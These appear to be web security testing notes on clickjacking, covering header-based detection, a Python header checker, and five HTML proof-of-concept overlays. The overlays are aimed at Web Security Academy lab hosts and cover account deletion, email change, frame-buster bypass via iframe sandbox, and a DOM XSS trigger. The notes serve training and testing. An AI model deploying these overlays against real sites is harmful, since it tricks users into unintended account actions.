Clickjacking

Clickjacking is an attack that tricks users into clicking on something different from what they perceive, usually by overlaying invisible iframes.

Methodology

Black Box Testing

  1. Visit all pages of the application and note the response headers.

  2. Look for the following headers:

    • X-Frame-Options

    • Content-Security-Policy

  3. Evaluate the headers:

    • If X-Frame-Options is set to DENY or SAMEORIGIN, the application is likely not vulnerable to clickjacking.

    • If the Content-Security-Policy header includes the frame-ancestors directive and it is set to 'none' or 'self', the application is also likely protected.

  4. If the frame-ancestors directive contains a domain (e.g., *.trusted.com), review it for:

    • Wildcard configurations

    • Misconfigurations or overly permissive policies

  5. Test any identified instances where framing is allowed to verify clickjacking vulnerabilities.
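A small header checker for steps 2 to 4, added here as an example and not part of the original notes: it takes a dict of response headers (the sample header sets below are constructed, not captured from any site) and reports whether framing is blocked, needs review, or is open. CSP frame-ancestors is evaluated first because browsers give it precedence over X-Frame-Options when both are present.

```python
# Added example: classify anti-framing headers the way steps 2-4 above describe.
# Inputs are plain header dicts; the SAMPLES at the bottom are constructed.
def parse_frame_ancestors(csp: str):
    """Return the frame-ancestors source list from a CSP value, or None if the directive is absent."""
    for directive in csp.split(";"):
        tokens = directive.strip().split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None

def assess_framing(headers: dict):
    """Classify a response as 'protected', 'review' or 'vulnerable', with a reason string."""
    h = {k.lower(): v for k, v in headers.items()}
    csp = h.get("content-security-policy")
    sources = parse_frame_ancestors(csp) if csp else None
    # frame-ancestors, when present, takes precedence over X-Frame-Options.
    if sources is not None:
        if sources in (["'none'"], ["'self'"]):
            return "protected", "frame-ancestors " + sources[0]
        if not sources:
            return "review", "frame-ancestors present but empty; check browser handling"
        permissive = [s for s in sources if s == "*" or s in ("http:", "https:")]
        if permissive:
            return "vulnerable", "frame-ancestors allows any origin via " + " ".join(permissive)
        wildcards = [s for s in sources if "*" in s]
        if wildcards:
            return "review", "wildcard sources in frame-ancestors: " + " ".join(wildcards)
        return "review", "frame-ancestors allows specific hosts: " + " ".join(sources)
    xfo = h.get("x-frame-options")
    if xfo is None:
        return "vulnerable", "no X-Frame-Options and no CSP frame-ancestors"
    value = xfo.strip().lower()
    if value in ("deny", "sameorigin"):
        return "protected", "X-Frame-Options " + value.upper()
    # ALLOW-FROM is obsolete and ignored by current browsers; unknown or conflicting
    # values are treated as invalid, which leaves framing allowed.
    return "vulnerable", "X-Frame-Options value not enforced by modern browsers: " + xfo

# Constructed sample responses covering each branch above.
SAMPLES = {
    "hardened": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
    "legacy_ok": {"X-Frame-Options": "SAMEORIGIN"},
    "wildcard": {"Content-Security-Policy": "frame-ancestors 'self' *.trusted.com"},
    "scheme_only": {"Content-Security-Policy": "frame-ancestors https:"},
    "obsolete": {"X-Frame-Options": "ALLOW-FROM https://partner.example"},
    "missing": {"Content-Type": "text/html"},
}
if __name__ == "__main__":
    for name, hdrs in SAMPLES.items():
        print(name, *assess_framing(hdrs))
```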


White Box Testing

  1. Identify the framework used by the application.

  2. Identify existing defenses related to clickjacking.

  3. Identify any libraries used to configure security headers.

  4. Review the header configurations and ensure they are set securely.

  5. Test the identified instances of clickjacking and develop proof-of-concept exploits where applicable.

POC - Basic clickjacking with CSRF token protection

<style>
		iframe {
			position:relative;
			width:1000px;
			height:1000px;
			opacity:1;
			z-index:2;
			}
		div {
			position:absolute;
			width:300px;
			height:400px;
			z-index:1;
			}
</style>
<div>click</div>
<iframe src="https://0a21002e04091c0a81cf6be700310017.web-security-academy.net/my-account/delete"></iframe>

POC - Clickjacking with form input data prefilled from a URL parameter

<style>
		iframe {
			position:relative;
			width:1000px;
			height:800px;
			opacity:0.00000001;
			z-index:2;
			}
		div {
			position:absolute;
			top:455px;
			left:80px;
			z-index:1;
			}
</style>
<div>Click me</div>
<iframe src="https://0a4800c9043cfe8887aab0b8007e0009.web-security-academy.net/my-account?email=pwned@admin-user.net"></iframe>

POC - Bypassing frame-busting script protections

A common client-side protection is a frame-busting (frame-breaking) script that runs in the browser and navigates the top window away if the page detects it is framed. An effective workaround against frame busters is the HTML5 iframe sandbox attribute: the allow-forms and allow-scripts values permit those specific actions inside the iframe, but top-level navigation stays disabled. This neutralises the frame-busting behaviour while leaving the targeted site's functionality usable.

If you see "This page cannot be framed", use sandbox="allow-forms" to bypass it.

<style>
		iframe {
			position:relative;
			width:1000px;
			height:800px;
			opacity:0.50;
			z-index:2;
			}
		div {
			position:absolute;
			top:455px;
			left:80px;
			z-index:1;
			}
</style>
<div>Click me</div>
<iframe sandbox="allow-forms" src="https://0a4a00ea0359905080cd71c100c100b7.web-security-academy.net/my-account?email=pwned@compromised-user.com"></iframe>

POC - Exploiting a clickjacking vulnerability to trigger DOM-based XSS

<style>
		iframe {
			position:relative;
			width:1000px;
			height:1000px;
			opacity:0.0000001;
			z-index:2;
			}
		div {
			position:absolute;
			top:800px;
			left:76px;
			z-index:1;
			}
</style>
<div>Click me</div>
<iframe src="https://0ae300dd03b6f211807821f600b8007a.web-security-academy.net/feedback?name=%3Cimg%20src=x%20onerror=print()%3E&email=test@test.com&subject=test&message=test"></iframe>

POC - Multistep clickjacking

<style>
		iframe {
			position:relative;
			width:$width_value;
			height:$height_value;
			opacity:$opacity;
			z-index:2;
			}
		.firstClick, .secondClick {
			position:absolute;
			top:$top_value1;
			left:$side_value1;
			z-index:1;
			}
		.secondClick {
			top:$top_value2;
			left:$side_value2;
			}
</style>
<div class="firstClick">Test me first</div>
<div class="secondClick">Test me next</div>
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/my-account"></iframe>
